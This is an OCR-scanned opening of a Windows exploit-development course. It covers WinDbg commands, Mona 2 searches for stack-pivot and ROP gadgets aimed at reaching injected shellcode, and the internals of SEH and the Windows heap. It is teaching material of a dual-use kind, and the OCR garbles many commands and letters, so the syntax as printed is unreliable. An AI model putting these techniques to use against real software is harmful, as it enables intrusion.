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EXPLOIT DEVELOPMENT COMMUNITY 


Preface 


Hi and welcome to this website! | know people don't like to read prefaces, so ГИ make it short and right to the 
point. 


This is the preface to a course about Modern Windows Exploit Development. | chose Windows because Гт 
very familiar with it and also because it’s very popular. In particular, | chose Windows 7 SP1 64-bit. Enough 
with Windows ХР: it’s time to move on! 


There are a few full-fledged courses about Exploit Development but they're all very expensive. If you can't 
afford such courses, you can scour the Internet for papers, articles and some videos. Unfortunately, the 
information is scattered all around the web and most resources are definitely not for beginners. If you always 
wanted to learn Exploit Development but either you couldn't afford it or you had a hard time with it, you've 
come to the right place! 


This is an introductory course but please don’t expect it to be child’s play. Exploit Development is hard and 
no опе can change this fact, no matter how good he/she is at explaining things. I'll try very hard to be as 
clear as possible. If there’s something you don’t understand or if you think | made a mistake, you can leave 
a brief comment or create a thread in the forum for a longer discussion. | must admit that I’m not an expert. | 
did a lot of research to write this course and | also learned a lot by writing it. The fact that I’m an old-time 
reverse engineer helped a lot, though. 


In this course | won't just present facts, but ГИ show you how to deduce them by yourself. ГИ try to motivate 
everything we do. l'Il never tell you to do something without giving you a technical reason for it. In the last 
part of the course we'll attack Internet Explorer 10 and 11. My main objective is not just to show you how to 
attack Internet Explorer, but to show you how a complex attack is first researched and then carried out. 
Instead of presenting you with facts about Internet Explorer, we're going to reverse engineer part of Internet 
Explorer and learn by ourselves how objects are laid out in memory and how we can exploit what we've 
learned. This thoroughness requires that you understand every single step of the process or you'll get lost in 
the details. 


As you’ve probably realized by now, English is not my first language (I’m Italian). This means that reading 
this course has advantages (learning Exploit Development) and disadvantages (unlearning some of your 
English). Do you still want to read it? Choose wisely 


To benefit from this course you need to know and be comfortable with X86 assembly. This is not negotiable! 
| didn't even try to include an assembly primer in this course because you can certainly learn it on your own. 
Internet is full of resources for learning assembly. Also, this course is very hands-on so you should follow 
along and replicate what | do. | suggest that you create at least two virtual machines with Windows 7 SP1 
64-bit: one with Internet Explorer 10 and the other with Internet Explorer 11. 


| hope you enjoy the ride! 
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WinDbg 


WinDbg is a great debugger, but it has lots of commands, so it takes time to get comfortable with it. ГИ be 
very brief and concise so that | don't bore you to death! To do this, I'll only show you the essential 
commands and the most important options. We’ll see [o [o опа! commands and options when ме need them 
in the next chapters. 


Version 


To avoid problems, use the 32-bit version of WinDbg to debug 32-bit executables and the 64-bit version to 
debug 64-bit executables. 


Alternatively, you can switch WinDbg between the 32-bit and 64-bit modes with the following command: 


lwow64exts.sw 


Symbols 


Open a new instance of WinDbg (if you’re debugging a process with WinDbg, close WinDbg and reopen it). 
Under File—Symbol File Path enter 


SRV*C:\windbgsymbols*http://msdl.microsoft.com/download/symbols 


Save the workspace (File— Save Workspace). 


The asterisks are delimiters. WinDbg will use the first directory we specified above as a local cache for 
symbols. The paths/urls after the second asterisk (separated by ‘;‘, if more than one) specify the locations 
where the symbols can be found. 


Adding Symbols during Debugging 
То аррепа а symbol search path to the default one during debugging, use 


„зутраћ+ c:\symbolpath 


(The command without the ‘+ would replace the default search path rather than append to it.) 
Now reload the symbols: 


reload 


Checking Symbols 
Symbols, if available, are loaded when needed. To see what modules have symbols loaded, use 


x" 
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The x command supports wildcards and can be used to search for symbols in one or more modules. For 
instance, we can search for all the symbols in кегле!32 whose name starts with virtual this way: 


0:000> x kernel32!virtual* 

751d4bbf kernel32!VirtualQueryExStub («no parameter info?) 
7576d950 kernel32!VirtualAllocExStub (<no parameter info>) 
7571661 kernel32!VirtualAllocExNuma («no parameter info?) 
75794641 kernel32!VirtualProtectExStub («no parameter info?) 
7575421 kernel32!VirtualProtectStub («no parameter info?) 
7576d975 kernel32!VirtualFreeEx (<no parameter info>) 


7575184b kernel32!VirtualFree (<no parameter info>) 


75751833 kernel32!VirtualAlloc (<no parameter info>) 

75754 3ef kernel32!VirtualQuery (<no parameter info>) 
757510с8 kernel32!VirtualProtect («no parameter info?) 
75711140 kernel32!VirtualProtectEx («no parameter info») 
7575183е kernel32!VirtualFreeStub («no parameter info?) 
75751826 kernel32!VirtualAllocStub («no parameter info?) 
7576d968 kernel32!VirtualFreeExStub (<no parameter info>) 
75754 3fa kernel32!VirtualQueryStub (<no parameter info>) 
757беее1 kernel32!VirtualUnlock («no parameter info?) 
7576ebdb kernel32!VirtualLock («no parameter info?) 
7576а95а kernel32!VirtualAllocEx («no parameter info?) 
757d4b3f kernel32!VirtualAllocExNumaStub (<no parameter info>) 
7571158 kernel32!VirtualQueryEx («no parameter info?) 





The wildcards can also be used in the module part: 


0:000> x *!messagebox* 

7539fbd1 USER32!MessageBoxlndirectA («no parameter info?) 
7539fcfa USER32!MessageBoxExW («no parameter info?) 
753977а1 USER32!MessageBoxWorker («no parameter info?) 


7539fcd6 USER32!MessageBoxExA («no parameter info?) 
7539fc9d USER32!MessageBoxlndirectW («no parameter info?) 
7539fd1e USER32!MessageBoxA (<no parameter info>) 
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7539fd3f USER32!MessageBoxW («no parameter info?) 


7539fb28 USER32!MessageBoxTimeoutA (<no parameter info>) 


7539facd USER32!MessageBoxTimeoutW (<no parameter info>) 





You can force WinDbg to load symbols for а! modules with 


This takes a while. Go to Debug—Break to stop the operation. 


Help 
Just type 


or press F1 to open help window. 
То get help for a specific command type 


where «command» is the command you're interested in, or press F 1 and select the tab Index where you can 
search Тог {Пе topic/command you want. 


Debugging Modes 


Locally 
You can either debug a new process or a process already running: 


1: Run a new process to debug with File Open Executable. 
2. Attach to a process already running with File—Attach to a Process. 
Remotely 


To debug a program remotely there are at least two options: 


1. If you're already debugging a program locally on machine A, you can enter the following command 
(choose the port you want): 


.server tcp:port=1234 


This will start a server within WinDbg. 
On machine B, run WinDbg and go to File—Connect to Remote Session and enter 
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tcp:Port=1234,Server=<IP of Machine A> 
specifying the right port and IP. 


2. On machine A, run dbgsrv with the following command: 


dbgsrv.exe -t tcp:port=1234 


This will start a server on machine A. 
On machine B, run WinDbg, go to File—Connect to Remote Stub and enter 


tcp:Port=1234,Server=<IP of Machine A> 


with the appropriate parameters. 

You'll see that File— Open Executable is disabled, but you can choose File—Attach to а Process. In that 
case, you'll see the list of processes on machine A. 

To stop the server on machine A you can use Task Manager and kill dbgsrv.exe. 


Modules 


When you load an executable or attach to a process, WinDbg will list the loaded modules. If you want to list 
the modules again, enter 


Imf 
To list a specific module, say ntdll.dll, use 


Imf m пќаі! 


To get the image header information of a module, say ntdll.dll, type 


Idh ntdlil 


The "" means that the command is an extension, i.e. an external command which is exported from an 
external DLL and called inside WinDbg. Users can create their own extensions to extend WinDbg's 
functionality. 

You can also use the start address of the module: 


0:000» Imf m ntdll 


start end module name 


77790000 77910000 та! ntdil.dil 
0:000> !dh 77790000 
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Expressions 


WinDbg supports expressions, meaning that when a value is required, you can type the value directly or you 
can type an expression that evaluates to a value. 
For instance, if EIP is 77c6cb70, then 


bp 77c6cb71 


and 


bp EIP+1 


are equivalent. 
You can also use symbols: 


и ntdll!CsrSetPriorityClass+0x41 


and registers: 


dd ebp+4 


Numbers are by default in base 16. To be explicit about the base used, add a prefix: 


0x123: base 16 (hexadecimal) 
0n123: base 10 (decimal) 
0t123: base 8 (octal) 

0y111: base 2 (binary) 


Use the command .format to display a value in many formats: 


0:000» Гогта 123 

Evaluate expression: 

Hex: 00000000`00000123 
Decimal: 291 

Octal: 0000000000000000000443 


Втагу: 00000000 00000000 00000000 00000000 00000000 00000000 00000001 00100011 


Time: Thu Jan 01 01:04:51 1970 
Float: low 4.07778e-043 high 0 
Double: 1.437 73е-321 





To evaluate an expression use '?*: 
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2 еах+4 


Registers and Pseudo-registers 


WinDbg supports several pseudo-registers that hold certain values. Pseudo-registers are indicated by the 
prefix ‘$. 

When using registers or pseudo-registers, one can add the prefix ‘@‘ which tells WinDbg that what follows is 
a register and not a symbol. If ‘@‘ is not used, WinDbg will first try to interpret the name as a symbol. 

Here are a few examples of pseudo-registers: 


• $teb ог @Steb (address of the TEB) 
. Әрер or (2$peb (address of the РЕВ) 
$thread or @$thread (current thread) 


Exceptions 


To break on a specific exception, use the command sxe. For instance, to break when a module is loaded, 
type 


sxe Id «module name 1»,...,«module name N> 


For instance, 


sxe Id user32 


To see the list of exceptions type 


To ignore an exception, use sxi: 


This cancels out the effect of our first command. 


WinDbg breaks on single-chance exceptions and second-chance exceptions. They're not different kinds of 
exceptions. As soon as there's an exception, WinDbg stops the execution and says that there's been a 
single-chance exception. Single-chance means that the exception hasn’t been sent to the debuggee yet. 
When we resume the execution, WinDbg sends the exception to the debuggee. If the debuggee doesn’t 
handle the exception, WinDbg stops again and says that there’s been a second-chance exception. 


When we examine EMET 5.2, we'll need to ignore single-chance single step exceptions. To do that, we can 
use {һе following command: 


sxd sse 
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Breakpoints 


Software Breakpoints 


When you put a software breakpoint on one instruction, WinDbg saves to memory the first byte of the 
instruction and overwrites it with OxCC which is the opcode for “int 3“. 

When the “int 3” is executed, the breakpoint is triggered, the execution stops and WinDbg restores the 
instruction by restoring its first byte. 


To put a software breakpoint on the instruction at the address 0x4110a0 type 


bp 4110a0 


You can also specify the number of passes required to activate the breakpoint: 


bp 4110a0 3 


This means that the breakpoint will be ignored the first 2 times it’s encountered. 


To resume the execution (and stop at the first breakpoint encountered) type 


which is short for "go". 
To run until a certain address is reached (containing code), type 


g <code location> 


Internally, WinDbg will put a software breakpoint on the specified location (like 'bp'), but will remove the 
breakpoint after it has been triggered. Basically, ‘д’ puts a one-time software breakpoint. 


Hardware Breakpoints 


Hardware breakpoints use specific registers of the CPU and are more versatile than software breakpoints. In 
fact, one can break on execution or on memory access. 

Hardware breakpoints don't modify any code so they can be used even with self modifying code. 
Unfortunately, you can't set more than 4 breakpoints. 


In its simplest form, the format of the command is 
ba «mode» «size» «address» «passes (default-1)» 


where «mode»? can be 


1. 'e' for execute 
2. 'r' for read/write memory access 
3. 'W' for write memory access 
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«size» specifies the size of the location, in bytes, to monitor for access (it’s always 1 when «mode» is ʻe‘). 
«address» is the location where to put the breakpoint and «passes» is the number of passes needed to 
activate the breakpoint (see 'bp' for an example of its usage). 


Note: It's not possible to use hardware breakpoints for a process before it has started because hardware 
breakpoints are set by modifying CPU registers (drO, dr1, etc...) and when a process starts and its threads 
are created the registers are reset. 


Handling Breakpoints 
To list the breakpoints type 


where 'bl' stands for breakpoint list. 
Example: 


0:000> bl 


Oe77c6cb70 0002 (0002) 0:**** ntdll!CsrSetPriorityClass+0x40 





where the fields, from left to right, are as follows: 


0: breakpoint ID 
е: breakpoint status; can be (e)nabled or (d)isabled 
77c6cb70: memory address 
0002 (0002): the number of passes remaining before the activation, followed by the total number of 
passes to wait for the activation (i.e. the value specified when the breakpoint was created). 
ә 0:****: the associated process and thread. The asterisks mean that ће breakpoint is not геад- 
зрестс. 
• ntdll!CsrSetPriorityClass+0x40: the module, function and offset where the breakpoint is located. 


To disable a breakpoint type 


bd «breakpoint id» 


To delete a breakpoint use 


bc «breakpoint ID» 


To delete all the breakpoints type 


рс" 
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Breakpoint Commands 


If you want to execute a certain command automatically every time a breakpoint is triggered, you can specify 
the command like this: 


bp 402410 ".echo \"Неге are the registers:\n\"; г" 





Here’s another example: 


bp jscript9+c2c47 "printf "new Array Data: addr = Ox%p\\n\",eax;g" 





Stepping 
There are at least 3 types of stepping: 


1: step-in / trace (command: t) 
This command breaks after every single instruction. If you are on a call or int, the command breaks on the 
first instruction of the called function or int handler, respectively. 

2. step-over (command: p) 
This command breaks after every single instruction without following calls or ints, i.e. if you are on a call 
or int, the command breaks on the instruction right after the call or int. 

3. step-out (command: gu) 
This command (go up) resume execution and breaks right after the next ret instruction. It's used to exit 
functions. 
There two other commands for exiting functions: 


о tt (trace to next return): it’s equivalent to using the command ‘t‘ repeatedly and stopping on the 
first ret encountered. 
о pt (step to next return): it's equivalent to using the command ‘р’ repeatedly and stopping оп the 


first ret encountered. 

Note that tt goes inside functions so, if you want to get to the ге instruction of the current function, use 
pt instead. 

The difference between pt and gu is that pt breaks on the ret instruction, whereas gu breaks on the 
instruction right after. 


Неге are the variants of ‘р’ and ‘t: 


pa/ta «address»: step/trace to address 

pc/tc: step/trace to next call/int instruction 

pt/tt: step/trace to next ret (discussed above at point 3) 
pct/tct: step/trace to next call/int or ret 

ph/th: ѕќер/ігасе to next branching instruction 


Displaying Memory 
To display the contents of memory, you can use 'd' or one ofits variants: 


. db: display bytes 
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dw: display words (2 bytes) 

dd: display dwords (4 bytes) 

dq: display gwords (8 bytes) 

dyb: display bits 

da: display null-terminated ASCII strings 
du: display null-terminated Unicode strings 


Type .hh d for seeing other variants. 


The command 'd' displays data in the same format as the most recent 4“ command (or db if there isn't one). 
The (simplified) format of these commands is 


а“ [range] 


Here, the asterisk is used to represent all the variations we listed above and the square brackets indicate 
that range is optional. If range is missing, d* will display the portion of memory right after the portion 
displayed by the most recent d* command. 

Ranges can be specified many ways: 


1. «start address» «end address» 
For instance, 


db 77сас000 77сасой 


2. «start address» L«number of elements» 
For instance, 


dd 77cac000 L10 


displays 10 dwords starting with the one at 77сас000. 
Note: for ranges larger than 256 MB, we must use L? instead of L to specify the number of elements. 


З. «start address» 
When only the starting point is specified, WinDbg will display 128 bytes. 


Editing Memory 
You can edit memory by using 


e[d|w|b] <address> [<new value 1> ... <new value N>] 


where [d|w|b] is optional and specifies the size of the elements to edit (d = dword, w = word, b = byte). 
If the new values are omitted, WinDbg will ask you to enter them interactively. 


Here’s an example: 


http://expdev-kiuhnm.rhcloud.com 





2132 





EXPLOIT DEVELOPMENT COMMUNITY 


еа ер сс сс 
This overwrites the first two dwords at the address in eip with the value OxCC. 


Searching Memory 
To search memory use the '5' command. Its format is: 


$ [-d|-w|-b|-a|-u] «start address> L?<number of elements» «search values» 


where d, w, b a and и means dword, word, byte, ascii and unicode. 
<search values> is the sequence of values to search. 
For instance, 


S -d eip 121000 cc cc 
searches for the two consecutive dwords Oxcc Oxcc in the memory interval [eip, eip + 1000*4 — 1]. 


Pointers 
Sometimes you need to dereference a pointer. The operator to do this is poi: 


dd poi(ebp*4) 
In this command, poi(ebp-*4) evaluates to the dword (or qword, if in 64-bit mode) at the address ебр+4. 


Miscellaneous Commands 
To display the registers, type 


To display specific registers, say eax and edx, type 


r eax, edx 
To print the first 3 instructions pointed to by EIP, use 


u EIP L3 


where 'u' is short for unassemble and ‘L‘ lets you specify the number of lines to display. 


To display the call stack use 


http://expdev-kiuhnm.rhcloud.com 





- 14- 





EXPLOIT DEVELOPMENT COMMUNITY 


Dumping Structures 
Here are the commands used to display structures: 


Displays a singly-linked list, where: 


Islist «address» «address» is the address of the pointer to the first node of the list 
[ <symbol> [<offset>] ] «symbol» is the name of the structure of the nodes 
<offset> is the offset of the field “next” within the node 


dt <struct name> Displays the structure <struct name>. 
dt «struct name» <field> |Displays the field «field» of the structure <structname>. — | 


dt «struct name> Displays the data at «address» as a structure of type «struct name» (you need 
«address» symbols for «struct name>). 
> 
dd <iitst selector=[Slast Displays the segment descriptor for the specified selectors. 
selector>] 


Suggested SETUP 
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Mona 2 


Mona 2 is a very useful extension developed by the Corelan Team. Originally written for immunity Debugger, 
it now works in WinDbg as well. 


Installation in WinDbg 
You'll need to install everything for both WinDbg x86 and WinDbg x64: 


1. Install Python 2.7 (download it from here) 
Install the x86 and x64 versions in different directories, e.g. c:\python27(32) and c: python27. 
2. Download the right zip package from here, and extract and run vcredist x86.exe and 


vcredist_x64.exe. 
Download the two exes (x86 and x64) from here and execute them. 


3 
4. Download windbglib.py and mona.py from here and put them in the same directories as windbg.exe 
(32-bit and 64-bit versions). 
5. Configure the symbol search path as follows: 
T. click on File Symbol File Path 
2. enter 
3. save the workspace (File— Save Workspace). 


Running mona.py under WinDbg 
Running mona.py in WinDbg is simple: 


1. Load the рука extension with the command 
load pykd.pyd 
2. To run mona use 


То update топа enter 


Іру mona update 
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Configuration 


Working directory 

Many functions of mona dump data to files created in the mona's working directory. We can specify a 
working directory which depends on the process name and id by using the format specifiers %р (process 
name) and %i (process id). For instance, type 


!1ру топа config -set workingfolder "C:\mona_files\%p_%i" 





Exclude modules 
You can exclude specific modules from search operations: 


топа config -set excluded_modules "module1.dll,module2.dll" 


попа config -add excluded modules "module3.dll,module4.dll" 





Author 
You can also set the author: 


Imona config -set author Kiuhnm 


This information will Бе used when producing metasploit compatible output. 


Important 
If there's something wrong with WinDbg and mona, try running WinDbg as an administrator. 


Mona's Manual 
You can find more information about Mona here. 


Example 
This example is taken from Mona’s Manual. 


Let's say that we control the value of ECX in the following code: 


Example 
Assembly (x86) 





We want to use that piece of code to jmp to our shellcode (i.e. the code we injected into the process) whose 
address is at ESP+4, so we need the call above to call something like “ADD ESP, 4 | КЕТ“. 
There is 01 of indirection in the piece of code above: 


http://expdev-kiuhnm.rhcloud.com 





-18- 





EXPLOIT DEVELOPMENT COMMUNITY 


1. (ЕСХ-р1)->р2 
2. р2+58һ  p3 > “ADD ESPA | ВЕТ” 


First we need to find p3: 


Ipy mona config -set workingfolder c:\logs 


1ру mona stackpivot -distance 4,4 





The function stackpivot finds pointers to code equivalent to “ADD ESP, X | RET” where X is between min 
and max, which are specified through the option “-distance min,max". 

The pointers/addresses found are written to c:\logs\stackpivot.txt. 

Now that we have our p3 (many p3s!) we need to find p1: 


Іру mona find -type file -s "c:\logs\stackpivot.txt" -x * -offset 58 -level 2 -offsetlevel 2 





Let's see what all those options mean: 


“-х *” means “accept addresses in pages with any access level” (as another example, with “-x Х” we 


want only addresses in executable pages). 
“-level 2” specifies the level of indirection, that is, it tells mona to find “a pointer (р1) to a pointer (p2) 


to a pointer (p3)". 
• The first two options ( уре and -s) specifies that рз must be a pointer listed in the Пе 


“c:\logs\stackpivot.txt*. 
“-offsetievel 2” and “-offset 58” tell mona that the second pointer (p2) must point to the third pointer 


(03) once incremented Бу 58h. 


Don't worry too much if this example isn't perfectly clear to you. This is just an example to show you what 
Mona can do. | admit that the syntax of this command is not very intuitive, though. 


Example 
The command findwild allows you to find chains of instructions with a particular form. 


Consider this example: 


топа findwild -s "push r32 # * # pop eax # inc eax # * # retn" 


The option “-s” specifies the shape of the chain: 


• instructions are separated with +“ 
• r32 is any 32-bit register 
• “is any sequence of instructions 


The optional arguments supported are: 


• -depth «nr»: maximum length of the chain 
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• -b «address»: base address for the search 
• -{ <address>: top address for the search 


-all: returns also chains which contain “bad” instructions, i.e. instructions that might break the chain 
(jumps, calls, etc...) 


ROP Chains 
Mona can find ROP gadgets and build ROP chains, but | won't talk about this here because you're not 


supposed to know what a ROP chain is or what ROP is. As I said, don't worry if this article doesn't make 
perfect sense to you. Go on to the next article and take it easy! 
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structured Exception Handling (SEH) 


The exception handlers are organized in a singly-linked list associated with each thread. As a rule, the 
nodes of that list are allocated on the stack. 

The head of the list is pointed to by a pointer located at the beginning of the TEB (Thread Environment 
Block), so when the code wants to ада а new exception handler, а new node is added to the head of the list 
and the pointer in the TEB is changed to point to the new node. 

Each node is of type EXCEPTION REGISTRATION RECORD and stores the address of the handler and 
a pointer to the next node of the list. Oddly enough, the "next pointer" of the last node of the list is not null 
but equal to Oxffffffff. Here's the exact definition: 


0:000» dt. EXCEPTION REGISTRATION RECORD 
ntdl! EXCEPTION REGISTRATION RECORD 


+0x000 Next : Ptr32. EXCEPTION REGISTRATION RECORD 
*0x004 Handler : Ptr32 — EXCEPTION DISPOSITION 





The TEB can also be accessed through the selector fs, starting from fs:[0], so it's common to see code like 
the following: 


Assembly (x86) 
, dword ptr fs:[O0000000h] 


й -10h] 
dword ptr fs:[00000000h], 


, dword ptr [ebp-10h] 
dword ptr fs:[00000000h], 





Compilers usually register a single global handler that knows which area of the program is being executed 
(relying оп а global variable) and behaves accordingly when it's called. 

Since each thread has a different TEB, the operating system makes sure that the segment selected by fs 
refers always to the right TEB (i.e. the one of the current thread). To get the address of the TEB, read 
fs:[18h] which corresponds to the field Self of the TEB. 


Let's display the TEB: 


0:000» !teb 
TEB at 7efdd000 


ExceptionList: 003ef804 
StackBase: 00310000 
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StackLimit: 003е9000 
SubSystemTib: 00000000 
FiberData: 00001600 
ArbitraryUserPointer: 00000000 

Self: 7efdd000 
EnvironmentPointer: 00000000 
Clientld: 00001644 . 00000914 


RpcHandle: 00000000 
Tls Storage: 7efdd02c 
PEB Address: 7efde000 
LastErrorValue: 2 
LastStatusValue: с0000034 
Count Owned Locks: 0 
HardErrorMode: 0 





Now let's verify that fs refers to the TEB: 


0:000» dg fs 
P Si Gr Pr Lo 


Sel Вазе Limit Type lze ап es па Flags 


0053 7efdd000 00000# Data RW Ас З Bg By P. NI 000004f3 





As we said above, fs:18h contains the address of the TEB: 


0:000» 2 poi(fs:[18]) 
Evaluate expression: 2130563072 - 7efdd000 





Remember that poi dereferences a pointer and '?' is used to evaluate an expression. 


Let's see what's the name of the structure pointed to by ExceptionList above: 


0:000» dt nt! NT TIB ExceptionList 
ntdll! NT TIB 


+0х000 ExceptionList : Ptr32 _ EXCEPTION REGISTRATION RECORD 
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This means that each node is an instance of EXCEPTION REGISTRATION RECORD, as we already said. 
To display the entire list, use !slist: 


0:000? !slist $teb EXCEPTION REGISTRATION RECORD 

SLIST HEADER: 
+0х000 Alignment 
*0x000 Next 
+0x004 Depth 


+0x006 Sequence 


SLIST CONTENTS: 


003ef804 
*0x000 Next 
*0x004 Handler 
003ef850 
*0x000 Next 
*0x004 Handler 
003ef89c 
*0x000 Next 
*0x004 Handler 
шини 
*0x000 Next 
*0x004 Handler 


: 3f(0000003ef804 
: 3ef804 
:0 
: ЗЕ 


: 0x003ef850 EXCEPTION REGISTRATION RECORD 


:0x6d5da0d5 . EXCEPTION DISPOSITION MSVCR120! except һапаіег4+0 


: 0x003ef89c EXCEPTION REGISTRATION RECORD 


:0x00271709 .— EXCEPTION DISPOSITION +0 


: Oxfffffffff EXCEPTION REGISTRATION RECORD 


:0x77e21985 | EXCEPTION DISPOSITION та! except һапаіег4+0 


Can't read memory at ffffffff, error 0 





Remember that $teb is the address of the TEB. 


A simpler way to display the exception handler chain is to use 


0:000» lexchain 


003ef804: MSVCR120! except һапаіег4+0 (6d5da0d5) 
CRT scope 0, func: MSVCR120!doexit+116 (6d613b3b) 


003ef850: exploitme3+1709 (00271709) 
003ef89c: ntdll! except_handler4+0 (77e21985) 
CRT scope 0, filter: ntdll! RtlUserThreadStart+2e (77e21c78) 


ET 
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func: nitdll!_RtlUserThreadStart+63 (77e238cb) 
We сап also examine {Пе exception Пап ег chain manually: 


0:000» dt 00361804 EXCEPTION REGISTRATION RECORD 
MSVCR120! EXCEPTION. REGISTRATION RECORD 
+0x000 Next : 0x003ef850 EXCEPTION REGISTRATION RECORD 
+0x004 Handler :0x6d5da0d5 . EXCEPTION DISPOSITION MSVCR120! except һапаіег4+0 
0:000» dt 0x003ef850 EXCEPTION REGISTRATION RECORD 
MSVCR120! EXCEPTION. REGISTRATION RECORD 


+0x000 Next : 0x003ef89c EXCEPTION REGISTRATION RECORD 
%0х004 Handler :0x00271709 . EXCEPTION DISPOSITION +0 
0:000» dt 0x003ef89c EXCEPTION REGISTRATION RECORD 
MSVCR120! EXCEPTION REGISTRATION RECORD 
+0x000 Next : Oxfffffffff EXCEPTION REGISTRATION RECORD 
+0x004 Handler : 0х77е21985 . EXCEPTION DISPOSITION ntdil!! ехсерї Пап @ег4+0 
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Неар 


When а process starts, the heap manager creates а new heap called the default process heap. С/С++ 
applications also creates the so-called CRT heap (used by new/delete, malloc/free and their variants). It is 
also possible to create other heaps via the HeapCreate API function. The Windows heap manager can be 
broken down into two components: the Front End Allocator and the Back End Allocator. 


Front End Allocator 


The front end allocator is an abstract optimization layer for the back end allocator. There are different types 
of front end allocators which are optimized for different use cases. The front end allocators are: 


1. Look aside list (LAL) front end allocator 
2. Low fragmentation (ГЕ) front end allocator 


The LAL is a table of 128 singly-linked lists. Each list contains free blocks of a specific size, starting at 16 
bytes. The size of each block includes 8 bytes of metadata used to manage the block. The formula for 
determining the index into the table given the size is index = ceil((size + 8)/8) - 1 where the “+8” accounts 
for the metadata. Note that index is always positive. 


Starting with Windows Vista, the LAL front end allocator isn't present anymore and the LFH front end 
allocator is used instead. The LFH front end allocator is very complex, but the main idea is that it tries to 
reduce the heap fragmentation by allocating the smallest block of memory that is large enough to contain 
data of the requested size. 


Back End АПосаюг 


If the front end allocator is unable to satisfy an allocation reguest, the reguest is sent to the back end 
allocator. 


In Windows $P, the back end allocator uses a table similar to that used in the front end allocator. The list at 
index 0 of the table contains free blocks whose size is greater than 1016 bytes and less than or equal to the 
virtual allocation limit (Ox7FFFO bytes). The blocks in this list are sorted by size in ascending order. The 
index 1 is unused and, in general, index x contains free blocks of size 8x. When a block of a given size is 
needed but isn’t available, the back end allocator tries to split bigger blocks into blocks of the needed size. 
The opposite process, called heap coalescing is also possible: when a block is freed, the heap manager 
checks the two adjacent blocks and if one or both of them are free, the free blocks may be coalesced into a 
single block. This reduces heap fragmentation. For allocations of size greater than Ox7FFFO bytes the heap 
manager sends an explicit allocation request to the virtual memory manager and keeps the allocated blocks 
on a list called the virtual allocation list. 


In Windows 7, there aren’t any longer dedicated free lists for specific sizes. Windows 7 uses a single free list 
which holds blocks of all sizes sorted by size in ascending order, and another list of nodes (of type ListHint) 
which point to nodes т the free list апа are used to find the nodes of {Пе appropriate size to satisfy the 
allocation request. 
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Heap segments 


All the memory used by the heap manager is requested from the Windows virtual memory manager. The 
heap manager requests big chunks of virtual memory called segments. Those segments are then used by 
the heap manager to allocate all the blocks and the internal bookkeeping structures. When a new segment 
is created, its memory is just reserved and only a small portion of it is committed. When more memory is 
needed, another portion is committed. Finally, when there isn't enough uncommitted space in the current 
segment, a new segment is created which is twice as big as the previous segment. If this isn't possible 
because there isn't enough memory, a smaller segment is created. If the available space is insufficient even 
for the smallest possible segment, an error is returned. 

Analyzing the Heap 


The list of heaps is contained in the PEB (Process Environment Block) at offset 0x90: 


0:001» dt РЕВ @%рер 

па!!! РЕВ 

+0х000 InheritedAddressSpace : 0 " 

+0х001 ReadImageFileExecOptions : 0 " 

+0х002 BeingDebugged : 0x1" 

+0х003 BitField :0х8" 

+0x003 ImageUsesLargePages : 0у0 

+0х003 IsProtectedProcess : 0176) 

+0х003 151 едасуРгосеѕѕ : 0у0 

+0х003 IslmageDynamicallyRelocated : Oy1 

%0х003 SkipPatchingUser32Forwarders : OyO 
+0х003 SpareBits : 0y000 

*0x004 Mutant : Oxffffffff Void 

+0х008 |тадеВазеАдагез5 : 0х004а0000 Void 
*0x00c Ldr : 0х77ер0200 РЕВ LDR DATA 
*0x010 ProcessParameters : 0х002013с8 RTL USER PROCESS PARAMETERS 
+0x014 SubSystemData  : (null) 

+0х018 РгосеззНеар : 0х00240000 Void 

+0х01с FastPebLock — :0x77eb2100 RTL CRITICAL SECTION 
*0x020 Atl ThunkSListPtr : (null) 

*0x024 IFEOKey : (null) 

%0х028 CrossProcessFlags : 0 

+0х028 Ргосезз!пјоб :0у0 
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+0x028 Processlnitializing : OyO 

+0x028 ProcessUsingVEH : 0у0 

+0x028 ProcessUsingVCH : 0у0 

+0х028 ProcessUsingFTH : Oyo 

*0x028 ReservedBitsO  : 0y000000000000000000000000000 (0) 
+0x02c KernelCallbackTable : 0x760eb9f0 Void 

+0х02с UserSharedinfoPtr : 0x760eb9f0 Мола 

*0x030 SystemReserved : [1]0 

*0x034 AtlThunkSListPtr32 : 0 

+0x038 ApiSetMap : 0x00040000 Void 

+0хОЗс TlsExpansionCounter : 0 

+0x040 TlsBitmap : Ox77eb4250 Void 

*0x044 TlsBitmapBits  : [2] Ox1fffffff 

+0х04с КеадОпјузћагедМетогуВазе : Ох7еѓе0000 Мола 
%0х050 Ноіраісһіпіогтайоп : (null) 

+0x054 ReadOnlyStaticServerData : Ox7efe0a90 -> (null) 
+0х058 AnsiCodePageData : Ох7ећоооо Void 

+0х05с OemCodePageData : Ox7efc0228 Void 

*0x060 UnicodeCaseTableData : Ox7efd0650 Void 

*0x064 NumberOfProcessors : 8 

*0x068 NtGlobalFlag  : 0x70 

+0x070 CriticalSectionTimeout : LARGE INTEGER Oxffffe86d°079b8000 
+0x078 HeapSegmentReserve : 0x100000 

+0x07c HeapSegmentCommit : 0x2000 

+0х080 НеарреСоттн Тога|РгееТћгезћоја : 0х10000 
+0х084 HeapDeCommitFreeBlockThreshold : 0х1000 
+0х088 NumberOfHeaps :7 

+0х08с MaximumNumberOfHeaps : 0x10 

+0х090 РгосеззНеарз : 0х77ер4760 -> 0х00290000 Void 
+0х094 GdiSharedHandleTable : (null) 


+0x098 ProcessStarterHelper : (null) 
+0х09с GdiDCAttributeList : 0 


- 77 = 
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*0x0a0 LoaderLock : 0x77eb20c0 _RTL_CRITICAL_SECTION 
+0х0а4 OSMajorVersion : 6 

*0x0a8 OSMinorVersion : 1 

%Охдас OSBuildNumber : Ox1db1 

*0x0ae OSCSDVersion  : 0x100 

%0х0р0 OSPlatformid :2 

+0x0b4 ImageSubsystem :2 

+0х068 ImageSubsystemMajorVersion : 6 

+0x0bc ImageSubsystemMinorVersion : 1 

+0х0с0 ActiveProcessAffinityMask : Oxff 

+0х0с4 СаіНапаіеВиҝег : [34] 0 

+0х14с PostProcesslnitRoutine : (null) 

+0x150 TIsExpansionBitmap : 0х77е6 4248 Void 

+0х154 TlsExpansionBitmapBits : [32] 1 

+0x1d4 Sessionld aul 

+0х1а8 AppCompatFlags : ULARGE INTEGER 0х0 

+0x1e0 AppCompatFlagsUser: ULARGE INTEGER 0x0 

*0x1e8 pShimData : (null) 

+0х1ес АррСотра то : (пи!) 

*0x1f0 CSDVersion : UNICODE_STRING "Service Pack 1" 
+0x1f8 ActivationContextData : 0х00060000 ACTIVATION CONTEXT DATA 
+0x1fc ProcessAssemblyStorageMap : 0x002d4988 ASSEMBLY STORAGE MAP 
